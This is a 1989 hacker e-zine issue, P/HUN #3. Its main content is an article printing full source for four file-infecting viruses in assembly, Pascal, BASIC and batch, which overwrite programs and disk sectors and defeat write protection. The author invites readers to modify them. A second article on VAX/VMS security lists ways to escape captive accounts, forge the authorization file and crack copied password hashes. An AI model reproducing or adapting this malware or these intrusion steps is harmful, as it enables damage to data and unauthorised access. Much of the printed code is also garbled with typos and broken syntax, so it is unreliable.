()---------------------------------------------------------------------------()
* = % = % = % = % = % = *
----= =----
-------% P H U N ]I[ %-------
----= =----
* = % = % = % = % = % = *
P/HUN Issue #3, Volume 2 Articles [10] + Introduction
Release : February 11th 1989 Comments: New - Vol 2
==P/HUN Magazine Inc.==
@ The Hacker's Den Bulletin Board System
[ Home of P/HUN Online Magazine & 2600 Magazine BBS #5 ]
(718)358/9209 :: 300/1200 Baud :: Open 24 Hrs
Proudly presents...
P/HUN Issue III
---------------
P/HUN Issue 3, Volume 2: Phile 1 of 11
Introduction & Index
--------------------
Welcome to P/HUN (fun) Issue III. A new volume for the New Year. We still
remember some people often ridiculed and thought that P/HUN Newsletter would
stop producing after the first or the second issue. Looks like that fraction
underestimated us severly.
I would also like to say this, P/HUN was started with one highly noble
thought in mind i.e. to spread knowledge that we individually or collectively
acquire through various resources. The intent has and will never be to
degrade other highly esteemed newsletters or compete with them in anyway.
The idea is to co-exist symbiotically for the good of the readers, in mutual
respect and assistance of each other.
We at P/HUN Inc. are very pleased that people enjoyed our last issue.
We received many calls from all over the U.S commenting about Mr. Slippery's
"Guide to PICK Operating System" and The Mentor's "Beginners Hacking Guide".
We at P/HUN Inc. would like to thank both of them for their great
contributions and hope hear more from them in future.
We are still looking for someone experienced enough to write various news and
happenings that occur in the Phreak/Hack community. I thank all that applied,
but we really didn't find anyone properly qualified.
A lot of hard work and effort has gone into making this issue possible. Yes
the size of this issue is record breaking. We hope you find it intresting.
If you have any comments, suggestion or would like to submit to our ever
growing newsletter, contact us at The Hacker's Den. If we find your article
intresting we will gladly publish it. Remember to only send us "original" &
"unreleased" stuff. There will be no exceptions. Although this issue contains
an article by Capt. Zap which has already been released. This file was a major
exeception due to the fact that we found it very intresting.
P/HUN Issues can be obtained from one of the sponsor boards listed below:
The Phoenix Project - 512-441/3088 [Official Phrack & LOD/H TJ! release point]
The Central Office - 914-234/3260 [2600 Bulletin Board System #2]
Here it is P/HUN Online Magazine Issue #3...Enjoy!
Red Knight & DareDevil
SysOps of The Hacker's Den
@ P/HUN Magazine Inc. / TSAN 89!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-------------------*
-=| Table of Contents |=-
*-------------------*
No. Phile Description Author Size
--- ---------------------------------------- ------ ----
#1 - Introduction & Table of Contents Red Knight 3K
#2 - Viruses: Assembly, Pascal, Basic & Batch Tesla Coil ][ 24K
#3 - VAX/VMS System Security Lawrence Xavier 18K
#4 - AUtomated VOice Network(AUTOVON): An Outline DareDevil 26K
#5 - The Pan Am Airline Computer Part "A" Red Knight 47K
#6 - The Pan Am Airline Computer Part "B" Red Knight 26K
#7 - Common Channel (I) Signalling:An overview Tubular Phreak 18K
#8 - Who's Listening * Capt. Zap 58K
#9 - An Introduction to BITNET Aristotle 10K
#10 - Plastic Card Encoding Practices & Standards Hasan Ali 6K
#11 - Lockpicking: An Indepth Guide The LockSmith 14K
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume 2: Phile #2 of 11 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Viruses: Assembly, Pascal, Basic & Batch
----------------------------------------
By Tesla Coil ][
[ I do not take any responsibility for any damages that may occur when ]
[ compiling viruses in this article. This article has been written to ]
[ promote knowledge into the amazing world of computer viruses. ]
Viruses can be written in practically every computer language known today.
Although most effective viruses have been written in Assembly.
Many of us think that viruses cannot be written in Basic due to its limited
ability. This is untrue. Basic has the capability of producing very effective
viruses if properly used. Combining assembly and basic could futher enhance
the effectiveness of the virus.
In this article we will examine some viruses written in Assembly, Pascal, Basic
and Batch written by B. Fix, R. Burger and M. Vallen which proved to be very
intresting to me.
Please use some caution handling these virus programs. Please use a separate
disks when you wish to compile.
Virus in Assembly Language
--------------------------
Most viruses out there have been written in assembly because assembly has the
unique ability to bypass operating system security.
Here is an example of a virus written under MS-DOS 2.1 and can obviously be
compiled in the later versions. The article contains remarks so as to further
explain the parts. Programmers may wish to delete those segments if desired.
***************************************************
; Program Virus
; Version 1.1
; Writter : R. Burger
; Created 1986
; This is a demonstration program for computer
; viruses. It has the ability to replace itself.
; and thereby modify other programs. Enjoy.
;**************************************************
Code Segment
Assume CS:Code
progr equ 100h
ORG progr
;**************************************************
; The three NOP's serve as the marker byte of the
; virus which allow it to identify a virus.
;**************************************************
MAIN:
nop
nop
nop
;**************************************************
; Initialize the pointers
;**************************************************
mov ax,00
mov es:[pointer],ax
mov es:[counter],ax
mov es:[disks],al
;**************************************************
; Get the selected drive
;**************************************************
mov ah,19h ;drive?
int 21h
;**************************************************
; Get the current path on the current drive
;**************************************************
mov cs:drive,al ;save drive
mov ah,47h ;dir?
mov dh,0
add al,1
mov dl,al ;in actual drive
lea si,cs:old_path ;
int 21h
;**************************************************
; Get the number of drives present. If only one
; is present, the pointer for the search order
; will be set to serach order + 6
;**************************************************
mov as,0eh ;how many disks
mov dl,0 ;
int 21h
mov al,01
cmp al,01 ;one drive
jnz hups3
mov al,06
hups3: mov ah,0
lea bx,search_order
add bx,ax
add bx,0001h
mov cs:pointer,bx
clc
;**************************************************
; Carry is set, if no more .COM's are found.
; Then, to avoid unnecessary work, .EXE files will
; be renamed to .COM files and infected.
; This causes the error message "Program to large
; to fit memory" when starting larger infected
; EXE programs.
;*************************************************
change_disk:
jnc no_name_change
mov ah,17h ;change .EXE to .COM
lea dx,cs:maske_exe
int 21h
cmp al,0ffh
jnz no_name_change ;.EXE found?
;****************************************************
; If neither .COM nor .EXE is found then sectors
; will be overwritten depending on the system time
; in milliseconds. This is the time of the complete
; "infection" of a storage medium. The virus can
; find nothing more to infect and starts its destruction
;*****************************************************
mov ah,2ch ; read system clock
int 21h
mov bx,cs:pointer
mov al,cs:[bx]
mov bx,dx
mov cx,2
mov dh,0
int 26h ; write crap on disk
;******************************************************
; Check if the end of the search order table has been
; reached . If so, end.
;******************************************************
no_name_change:
mov bx,cs:pointer
dec bx
mov cs:pointer,bx
mov dl,cs:[bx]
cmp dl,0ffh
jnz hups2
jmp hops
;****************************************************
; Get new drive from the search order table and
; select it .
;***************************************************
hups2:
mov ah,0eh
int 21h ;change disk
;***************************************************
; Start in the root directory
;***************************************************
mov ah,3bh ;change path
lea dx,path
int 21h
jmp find_first_file
;**************************************************
; Starting from the root, search for the first
; subdir. FIrst convert all .EXE files to .COM
; in the old directory
;**************************************************
find_first_subdir:
mov ah,17h ;change .exe to .com
lea dx,cs:maske_exe
int 21h
mov ah,3bh ;use root directory
lea dx,path
int 21h
mov ah,04eh ;search for first subdirectory
mov cx,00010001b ;dir mask
lea dx,maske_dir ;
int 21h ;
jc change_disk
mov bx,CS:counter
INC,BX
DEC bx
jz use_next_subdir
;*************************************************
; Search for the next subdirectory. If no more
; directories are found, the drive will be changed.
;*************************************************
find_next_subdir:
mov ah,4fh ; search for next subdir
int 21h
jc change_disk
dec bx
jnz find_next_subdir
;*************************************************
; Select found directory.
**************************************************
use_next_subdir:
mov ah,2fh ;get dta address
int 21h
add bx,1ch
mov es:[bx],'\` ;address of name in dta
inc bx
push ds
mov ax,es
mov ds,ax
mov dx,bx
mov ah,3bh ;change path
int 21h
pop ds
mov bx,cs:counter
inc bx
mov CS:counter,bx
;**************************************************
; Find first .COM file in the current directory.
; If there are none, search the next directory.
;**************************************************
find_first_file:
mov ah,04eh ;Search for first
mov cx,00000001b ;mask
lea dx,maske_com ;
int 21h ;
jc find_first_subdir
jmp check_if_ill
;**************************************************
; If program is ill(infected) then search for
; another other.
;**************************************************
find_next_file:
mov ah,4fh ;search for next
int 21h
jc find_first_subdir
;*************************************************
; Check is already infected by virus.
**************************************************
check_if_ill:
mov ah,3dh ;open channel
mov al,02h ;read/write
mov dx,9eh ;address of name in dta
int 21
mov bx,ax ;save channel
mov ah,3fh ; read file
mov ch,buflen ;
mov dx,buffer ;write in buffer
int 21h
mov ah,3eh ;close file
int 21h
;***************************************************
; This routine will search the three NOP's(no
; operation).If present there is already an infection.
; We must then continue the search
;****************************************************
mov bx,cs:[buffer]
cmp bx,9090h
jz find_next_file
;***************************************************
; This routine will BY PASS MS-DOS WRITE PROTECTION
; if present. Very important !
;***************************************************
mov ah,43h ;write enable
mov al,0
mov dx,9eh ;address of name in dta
int 21h
mov ah,43h
mov al,01h
and cx,11111110b
int 21h
;****************************************************
; Open file for read/write access.
*****************************************************
mov ah,3dh ;open channel
mov al,02h ;read/write
mov dx,9eh ;address of name in dta
int 21h
;****************************************************
; Read date entry of program and save for future
; use.
;****************************************************
mov bx,ax ;channel
mov ah,57h ;get date
mov al.0
int 21h
push cx ;save date
push dx
;****************************************************
; The jump located at address 0100h of the program
; will be saved for further use.
*****************************************************
mov dx,cs:[conta] ;save old jmp
mov cs:[jmpbuf],dx
mov dx,cs:[buffer+1] ;save new jump
lea cx,cont-100h
sub dx,cx
mov cs:[conta],dx
;*****************************************************
; The virus copies itself to the start of the file.
;*****************************************************
mov ah,57h ;write date
mov al,1
pop dx
pop cx ;restore date
int 21h
;*****************************************************
; Close the file.
;*****************************************************
mov ah,3eh ;close file
int 21h
;*****************************************************
; Restore the old jump address. The virus saves at
; address "conta" the jump which was at the start of
; the host program.
; This is done to preserve the executability of the
; host program as much as possible.
; After saving it still works with the jump address
; contained in the virus. The jump address in the
; virus differs from the jump address in memory.
;****************************************************
mov dx,cs:[jmpbuf] ;restore old jump
mov cs:[conta],dx
hops: nop
call use_old
;****************************************************
; Continue with the host program.
;****************************************************
cont db 0e9h ;make jump
conta dw 0
mov ah,00
int 21h
;***************************************************
; Reactivate the selected drive at the start of
; the program.
;***************************************************
use_old:
mov ah,0eh ;use old drive
mov dl,cs:drive
int 21h
;***************************************************
; Reactivate the selected path at the start of
; the program.
;***************************************************
mov ah,3bh ;use old drive
lea dx,old_path-1 ;get old path and backslash
int 21h
ret
search_order db 0ffh,1,0,2,3,0ffh,00,offh
pointer dw 0000 ;pointer f. search order
counter dw 0000 ;counter f. nth. search
disks db 0 ;number of disks
maske_com db "*.com",00 ;search for com files
maske_dir db "*",00 ;search for dir's
maske_exe db offh,0,0,0,0,0,00111111b
db 0,"????????exe",0,0,0,0
db 0,"????????com",0
maske_all db offh,0,0,0,0,0,00111111b
db 0,"???????????",0,0,0,0
db 0,"????????com",0
buffer equ 0e00h ;a safe place
buflen equ 230h ;lenght of virus!!!!
;carefull
;if changing!!!!
jmpbuf equ buffer+buflen ;a safe place for jmp
path db "\",0 ;first place
drive db 0 ;actual drive
back_slash db "\"
old_path db 32 dup (?) ;old path
code ends
end main
[ END OF THIS VIRUS PROGRAM ]
Virus in Pascal
---------------
Pascal is another high level language that can produce eye popping computer
viruses. Especially when the usage of Turbo Pascal is involved.
The virus below was available through various bulletin boards for
a while.
{
------------------------------------------------------------------
Number One
Please handle this virus with care!!!!!!!!!!! [Deadly Demo]
Number One infects all .COM - file's name will be displayed
That file has been overwritten with Number Ones's program code and
is not reconstructible! If all files are infected or or no .COM
files are found, Number one gives you a .
Files may be protected against infections of Number One by
setting the Read ONLY attribute.
Written 10.3.87 by M.Vallen (Turbo Pascal 3.01A)
------------------------------------------------------ }
}
{C-}
{U-}
{I-} { Wont allow a user break, enable IO check}
{ -- Constants --------------------------------------- }
Const
VirusSize = 12027; {Number One's code size}
Warning :String[42] {Warning message}
= 'This file has been infected ny Number One!';
{ -- Type declarations------------------------------------- }
Type
DTARec =Record {Data area for file search }
DOSnext :Array[1..21] of Byte;
Attr : Byte;
Ftime,
FDate,
FLsize,
FHsize : Integer;
FullName: Array[1..13] of Char;
End;
Registers = Record {Register set used for file search }
Case Byte of
1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
End;
{ -- Variables--------------------------------------------- }
Var
{ Memory offset program code }
ProgramStart : Byte absolute Cseg:$100;
{ Infected marker }
MarkInfected : String[42] absolute Cseg:$180;
Reg : Registers; { Register set }
DTA : DTARec; { Data area }
Buffer : Array[Byte] of Byte; { Data buffer }
TestID : String[42]; { To recognize infected files }
UsePath : String[66]; { Path to search files }
{ Lenght of search path }
UsePathLenght: Byte absolute UsePath;
Go : File; { File to infect }
B : Byte; { Used }
{ -- Program code------------------------------------------ }
Begin
WriteLn(Warning); { Display warning message }
GetDir(0, UsePath); { get current directory }
if Pos('\', UsePath) <> UsePathLenght then
UsePath := UsePath + '\';
UsePath := UsePath + '*.COM'; { Define search mask }
Reg.AH := $1A; { Set data area }
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
Reg.AH := $4E;
Reg.DS := Seg(UsePath);
Reg.DX := Ofs(UsePath[1]);
Reg CX := $ff; { Set attribute to find ALL files }
MsDos(Reg); { Find first matching entry }
IF not Odd(Reg.Flags) Then { If a file found then }
Repeat
UsePath := DTA.FullName;
B := Pos(#0, UsePath);
If B > 0 then
Delete(UsePath, B, 255); { Remove garbage }
Assign(Go, UsePath);
Reset(Go);
If IOresult = 0 Then { If not IO error then }
Begin
BlockRead(Go, Buffer, 2);
Move(Buffer[$80], TestID, 43);
{ Test if file already ill(Infected) }
If TestID <> Warning Then { If not then ... }
Begin
Seek (Go, 0);
{ Mark file as infected and .. }
MarkInfected := Warning;
{ Infect it }
BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7);
Close(Go);
{ Say what has been done }
WriteLn(UsePath + 'infected.');
Halt; {.. and halt the program }
End;
Close(Go);
End;
{ The file has already been infected, search next. }
Reg.AH := $4F;
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
{ ......................Until no more files are found }
Until Odd(Red.Flags);
Write(`'); {Give a smile }
End.
Although this is a primitive virus its effective.In this virus only the .COM
files are infected. Its about 12K and it will change the date entry.
Viruses in Basic
----------------
Basic is great language and often people think of it as a limited language
and will not be of any use in creating something like a virus. Well you are
really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987.
This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE
files.To do this you must compile the source code using a the Microsoft
Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit
the source code to place the lenght of the object program in the LENGHTVIR
variable. BV3.EXE should be in the current directory, COMMAND.COM must be
available, the LENGHTVIR variable must be set to the lenght of the linked
program and remember to use /e parameter when compiling.
10 REM ** DEMO
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
30 REM ** BASIC DOESNT SUCK
40 REM ** NO KIDDING
50 ON ERROR GOTO 670
60 REM *** LENGHTVIR MUST BE SET **
70 REM *** TO THE LENGHT TO THE **
80 REM *** LINKED PROGRAM ***
90 LENGHTVIR=2641
100 VIRROOT$="BV3.EXE"
110 REM *** WRITE THE DIRECTORY IN THE FILE "INH"
130 SHELL "DIR *.EXE>INH"
140 REM ** OPEN "INH" FILE AND READ NAMES **
150 OPEN "R",1,"INH",32000
160 GET #1,1
170 LINE INPUT#1,ORIGINAL$
180 LINE INPUT#1,ORIGINAL$
190 LINE INPUT#1,ORIGINAL$
200 LINE INPUT#1,ORIGINAL$
210 ON ERROR GOT 670
220 CLOSE#2
230 F=1:LINE INPUT#1,ORIGINAL$
240 REM ** "%" IS THE MARKER OF THE BV3
250 REM ** "%" IN THE NAME MEANS
260 REM ** INFECTED COPY PRESENT
270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
290 EXTENSIONS$=MID$(ORIGINAL,9,13)
300 MID$(EXTENSIONS$,1,1)="."
310 REM *** CONCATENATE NAMES INTO FILENAMES **
320 F=F+1
330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN
GOTO 350
340 GOTO 320
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
360 ON ERROR GOTO 210
365 TEST$=""
370 REM ++ OPEN FILE FOUND +++
380 OPEN "R",2,OROGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
400 GET #2,2
410 LINE INPUT#1,TEST$
420 CLOSE#2
431 REM ++ CHECK IF PROGRAM IS ILL ++
440 REM ++ "%" AT THE END OF THE FILE MEANS..
450 REM ++ FILE IS ALREADY SICK ++
460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210
470 CLOSE#1
480 ORIGINALS$=ORIGINAL$
490 MID$(ORIGINALS$,1,1)="%"
499 REM ++++ SANE "HEALTHY" PROGRAM ++++
510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$
520 SHELL C$
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
540 C$="COPY "+VIRROOT$+ORIGINAL$
550 SHELL C$
560 REM *** APPEND VIRUS MARKER ***
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
580 WRITE#1,ORIGINALS$
590 CLOSE#1
630 REM ++ OUYPUT MESSAGE ++
640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!"
650 SYSTEM
660 REM ** VIRUS ERROR MESSAGE
670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
680 END
This basic virus will only attack .EXE files. After the execution you will
see a "INH" file which contains the directory, and the file %SORT.EXE.
Programs which start with "%" are NOT infected ,they pose as back up copies.
Batch Viruses
-------------
Whoever thought that viruses could be in BATCH file.This virus which we
are about to see makes use of MS-DOS operating system. This BATCH virus
uses DEBUG & EDLIN programs.
Name: VR.BAT
echo = off ( Self explanatory)
ctty nul ( This is important. Console output is turned off)
path c:\msdos ( May differ on other systems )
dir *.com/w>ind ( The directory is written on "ind" ONLY name entries)
edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear)
debug ind<2 ( New batch program is created with debug)
edlin name.bat<3 ( This batch goes to an executable form because of EDLIN)
ctty con ( Console interface is again assigned)
name ( Newly created NAME.BAT is called.
In addition to file to this Batch file,there command files,here named 1,2,3
Here is the first command file:
-------------------------------
Name: 1
1,4d ( Here line 1-4 of the "IND" file are deleted )
e ( Save file )
Here is the second command file:
--------------------------------
Name: 2
m100,10b,f000 (First program name is moved to the F000H address to save)
e108 ".BAT" (Extention of file name is changed to .BAT)
m100,10b,f010 (File is saved again)
e100"DEL " (DEL command is written to address 100H)
mf000,f00b,104 (Original file is written after this command)
e10c 2e (Period is placed in from of extension)
e110 0d,0a (Carrige return+ line feed)
mf010,f020,11f ( Modified file is moved to 11FH address from buffer area)
e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
e12b od,0a (COPY command terminated with carriage return + lf)
rxc ( The CX register is ... )
2c ( set to 2CH)
nname.bat ( Name it NAME.BAT)
w ( Write )
q ( quit )
The third command file must be printed as a hex dump because it contains
2 control characters (1Ah=Control Z) and this is not entirely printable.
Hex dump of the third command file:
-----------------------------------
Name: 3
0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
1 , 1 ? . . n y y y y y y y
0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
y . 2 , ? ? r . . n n y y y
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
y y y y . E . . . . . . . . .
In order for this virus to work VR.BAT should be in the root. This program only
affects .COM files.
End Note
--------
All these viruses can be modified to suit your needs. If anyone has seen any
intresting viruses please contact me at The Hacker's Den BBS.
Suggested readings:
Computer Viruses: A high Tech Disease by Abacus
2600 Magazine: Volume 5, Number 2
-TC][-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume 2: Phile #3 of 11 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
VAX/VMS System Security
=======================
Written for P/HUN Inc.,P/HUN Online Magazine
--------------------------------------------
By Lawrence Xavier
January, 1989
VAX/VMS may be the worlds best operating system. It certainly beats the
pants off each and every IBM OS, and wins over Unix hands down. Native
VAX/VMS security is rated higher (by the U.S. Government) than all IBM
mainframe OSs, even after such security packages as RACF and Top Secret
are added to them.
VMS is not without its foibles and kludges, however. For one thing,
enabling all the security features of VMS is guaranteed to crash the
system! For another, many of VMS's security features are annoying to
set up, encouraging lazy system managers to put off doing so indefinitely.
VMS got a bad reputation when young hackers were able to routinely break
into many systems by using default accounts and passwords such as username
SYSTEM with password MANAGER. This has all changed with VMS 4.7: in the
upgrade procedure the installer is required to change passwords on these
accounts or eliminate them entirely.
Let's go over some of the basic features of VMS security, then look at some
common problems and loopholes. Once you know what the loopholes are you can
take steps to close them on systems you manage and increase security.
VMS Security Features
=====================
Logging In:
-----------
VAX/VMS systems have several types of protection that can be set up on
logins. Logins can be restricted by time of day, day of the week, and by
terminal ID. Logins can also be restricted by where they come from: Local,
Remote, Dialup, etc.
Local are logins on direct connect ports or DECservers.
Remote are logins across DECnet.
Dialup are logins across X.25 or on ports set with the DIALUP
characteristic.
Usually VMS will present a
Username:
prompt after it sees one or two characters (which are used by VMS to
set the Baud rate, if AutoBaud is enabled).
If a System Password has been set on the port, VMS will BEEP after the
first , and will then seem to be dead. Only after the correct System
Password has been entered will the Username: prompt be given.
VMS gives no indication of whether a correct username has been entered: it
always asks for a Password:. VMS passwords can be like any other passwords,
or they may be generated nonsense words. The /GENERATE_PASSWORD qualifier
may be placed on user accounts by the system manager, forcing them to
select from lists of supposedly easy to remember but nonsensical
passwords.
The system manager may also enforce a minimum password length and can even
impose dual passwords on accounts. If a Username with dual passwords is
entered, the system will prompt for Password: twice in a row. Automatic
Password expiration dates can be set, forcing users to change their
passwords every so often: from once a day to once a year or never.
After the Username and Password have been entered, the system will either
log the user in, or will print the familiar message,
User Authorization Failure
and will hang up after a settable number of failures (the default is 3) if
the port characteristics include DIALUP and HANGUP.
Breakin Detection:
-----------------
If a hacker were trying to get into the system he could just continue to
dialup and try again. But VMS has some features to discourage this too.
If breakin detection and evasion is enabled, VMS will start to get cagey.
If the count of login failures from a specific source gets high enough, the
system assumes a break-in is in progress. Only login failures caused by
invalid Passwords are counted, NOT invalid usernames. And the attempts must
be coming from one of these three sources:
. A specific valid Username, and (if setup this way, A specific
terminal.
. A specific remote DECnet node and remote Username.
. The Username of the creator of a detached process.
By default, VMS allows five failed login attempts from any one source
within the time period specified. But it's not as simple as that!
Each time a failure occurs, time is added to the time period in which a
certain number of failures can occur. To take an example from DEC:
Assume the default values are in effect. LGI_BRK_LIM specifies no
more than five login failures from one source. LGI_BRK_TMO is set
for five minutes. Assume that an outsider starts sending user
names and passwords to the system. When the first password fails,
the clock starts to run and the user has four more tries in the
next five minutes. When the second attempt fails about 30 seconds
later, the user has three tries left that will be counted over
the next 9.5 minutes. When the third attempt fails 30 seconds
later, the login failure observation time has reached 22.5
minutes. As a result, the next login failure from that source
within 22.4 minutes will trigger evasive action. The system
tolerates an average rate of login failures that is the
reciprocal of the parameter LGI_BRK_TMO...
When breakin evasion is triggered, the system will give a:
User Authorization Failure
message even when a valid Username and Password are entered, giving no
indication of what it is doing. Note that ONLY the Username(s) in question
are treated this way: other Usernames can still log in from the same
terminal even if terminal-specific breakin detection is enabled.
The length of time VMS will hide in this way is controlled by the sysgen
parameter LGI_HID_TIM. But VMS doesn't hide for exactly this time. Rather,
it will hide for a length of time determined by the following equation:
Evasion time = LGI_HID_TIM * (random number between 1 and 1.5)
The parameter LGI_BRK_DISUSER can be set, and will tell VMS to permanently
disable accounts rather than just hiding for a time. The system manager
then has to re-enable them manually. This is a dangerous parameter to set,
however, because malicious individuals could deliberately disable accounts
then! If the SYSTEM account is disabled this way, it will only be allowed
to login on the VAX system console.
Security Alarms:
----------------
Although breakin attempts to different Usernames don't activate VMS Breakin
detection, they can trigger Security Alarms. Security Alarms can also be
triggered by different types of access to specific files or memory areas.
Security Alarms cause messages to be displayed on the system console, on
the terminals of any user enabled as Security Operator, and in the Operator
Log file.
As DEC says,
Because security auditing affects system performance, enable
security alarms only for the most important events.
Damn right! If all security alarms are enabled the system will hang! It
starts writing alarms about the fact it is writing alarms, ad infinitum....
Security alarms can be triggered on multiple login failures, on breakin, on
successful login from given ports, on failed attempts to access files, on
successful attempts to access files, etc. So even if you get privilege to
override protection or to defeat it a security alarm may still be
triggered.
Security alarms typically might be enabled on the AUTHORIZE program, which
adds and modifies user accounts, on SYSUAF.DAT, the authorization database,
on RIGHTSLIST.DAT, the access rights database, etc. and on critical
database files. But many sites don't bother with them because of their
inconvenience.
Accounting:
----------
Besides Security Alarms, Accounting can be enabled. Accounting can show
successful logins, login failures, how much resources are consumed by
processes, what programs are executed, etc. Not all sites enable
accounting, and not all sites enable the same amount of it. Accounting
records show login failures but only show the username that attempted to
login if it is a valid username.
File and Device Protection:
==========================
UIC:
----
The primary access protection mechanism is the UIC. This consists of a
Group and a User code, numerically represented as [nnn,nnn]. It is an Octal
number. Since VMS 4.x versions the UIC can also be expressed as [name] or
[name,name], but internally this is translated back to the old format.
Users, processes, files, devices, memory sections, etc. all have UICs.
Files, devices, memory sections, etc. can have access by System, Owner,
Group and World, any combination of Read, Write, Execute, Delete for each
category.
System are the system accounts.
Owner is the account(s) who's UIC is the same as that on the
object (file, device, etc.).
Group are accounts with the same first UIC number.
World is everyone.
So a process with UIC [23,7] could access an object with UIC [23,4] if that
object allowed access by Group or World. The process could access an object
with UIC [25,3] only if World access was allowed, and could access objects
with UIC [23,7] if Owner, Group, or World was allowed.
ACL:
----
Also, there's a protection mechanism called the ACL or Access Control List.
This is in addition to, and can override UIC protection. With ACLs an
Identifier is created, like MODEM for one or more modem ports. An ACL is
created on the port(s) desired, and in the ACL are multiple Access Control
Entries (ACEs). If one of them is:
(Identifier=MODEM, Access=Read+Write)
for example, user who has been Granted the identifier MODEM can access
those ports. These access privileges, like UICs apply to processes in
general. Granting and managing Identifiers is done in the AUTHORIZE
program.
Loopholes, Ways of Defeating Security...
========================================
Although VMS has great security it's often applied poorly. For one thing,
protection is often not set up properly, programs are installed with too
much privilege etc. (Programs can be installed so they have privilege when
run even if the user running them has no privilege).
Getting a $ prompt:
-------------------
If a hacker logs into a VMS system and finds himself trapped within
application programs the first thing he will want to do is to get out to
the normal DCL command mode from where more things can be done.
Hackers will try several things and you should check to make sure they
can't try these tricks on your system.
AllInOne:
In AllInOne, DEC's popular Electronic Mail and menuing Office Automation
system, typing
$
(the dollar sign) will by default take the user to DCL level.
Typing
ADMIN
will get the user into the AllInOne administrator menu. From there they can
create accounts with $ access.
AllInOne mail also has a feature where macros can be attached to mail and
executed when the mail is read. If the hacker sends a message of this type
to some user with privilege, the macro can go off in the background and
create accounts, etc. for the hacker. This feature should be disabled.
Other Captive Account tricks:
Holding down and letting it repeat for a while will often cause
accounts that are trapped in a command procedure but not marked as CAPTIVE
in the UAF to exit from the command procedure to DCL.
If an account has access to VAXMAIL (the MAIL command) it can often use
MAIL's SPAWN command to spawn a process with DCL access.
The TPU editor has a similar SPAWN command.
If an account is not marked CAPTIVE the user can try to add /NOCOMMAND
after the username, like the following:
Username: fred/nocommand
This will cause the command procedure to not be executed, leaving the
hacker at a DCL $ prompt.
There are many more too.
For this reason you should mark all accounts that are supposed to be
captive as CAPTIVE using the AUTHORIZE utility.
When at the $ Prompt:
---------------------
Since protection is often set incorrectly, hackers can take advantage and
use this to bypass security. A couple of examples will serve to show that
you must be diligent in setting the protections properly on systems you
manage.
If SYS$SYSTEM:AUTHORIZE.EXE is not protected, it can be run by non-
privileged users. The hacker would then run AUTHORIZE and create a new
SYSUAF.DAT file in his own directory (AUTHORIZE will do this by default if
not run in the SYS$SYSTEM directory). The hacker would add a privileged
username to the new SYSUAF.DAT, copy it back to SYS$SYSTEM:, log out, log
in again as the new privileged user, and quickly delete the new SYSUAF.DAT
so that other users don't get "Authorization Failure" messages. The hacker
would then be able to add privileged accounts to SYSUAF.DAT at his leisure.
Another clever idea would be for the hacker who has gained access to copy
SYSUAF.DAT to another directory and then try to find out what passwords are
in it. VMS uses a one-way encryption algorithm, but a gifted hacker will
use the same algorithm to repeatedly encrypt different passwords until he
finds ones that match. A copy of the VMS assembly language code to do this
encryption can be found in the appendix, for your information.
Again, setting the protection properly will keep this from happening to
your system!
Conclusion:
===========
This has been a brief overview of VMS security. For more information, read
your DEC manuals. A good place to start is the handy VMS System Manager's
Manual, Order Number AA-LA00A-TE, which can be obtained from DEC Direct and
should have come with your VMS update.
The importance of proper security cannot be over emphasized, but if you
overdo it performance will suffer. Experiment on your system to find a good
balance. Don't ignore security or you may regret it rather intensely.
Appendix -- VMS assembly code for encrypting passwords:
=======================================================
.TITLE HPWD - hash user password
.IDENT 'V02-002'
; Hash PassWorD:
; Hash a password irreversibly. This is one way encryption with
; no decryption possible.
; This code was obtained by disassembling the AUTHORIZE program.
; See the VMS microfiche for the fully commented code:
; e _lib$code:_lib$code+68
; Input Parameters:
; PWDDSC - Address of password descriptor
; ENCRYPT - Encryption algorithm index (byte)
; SALT - Random number (word)
; USRDSC - Address of username descriptor
; Output Parameters:
; OUTDSC - Address of encrypted output descriptor
OUTDSC=4
PWDDSC=OUTDSC+4
ENCRYPT=PWDDSC+4
SALT=ENCRYPT+4
USRDSC=SALT+4
.PSECT _LIB$CODE RD,NOWRT,PIC,SHR,BYTE,EXE
; AUTODIN-II polynomial table used by CRC algorithm
AUTODIN:
.LONG ^X000000000,^X01DB71064,^X03B6E20C8,^X026D930AC,^X076DC4190
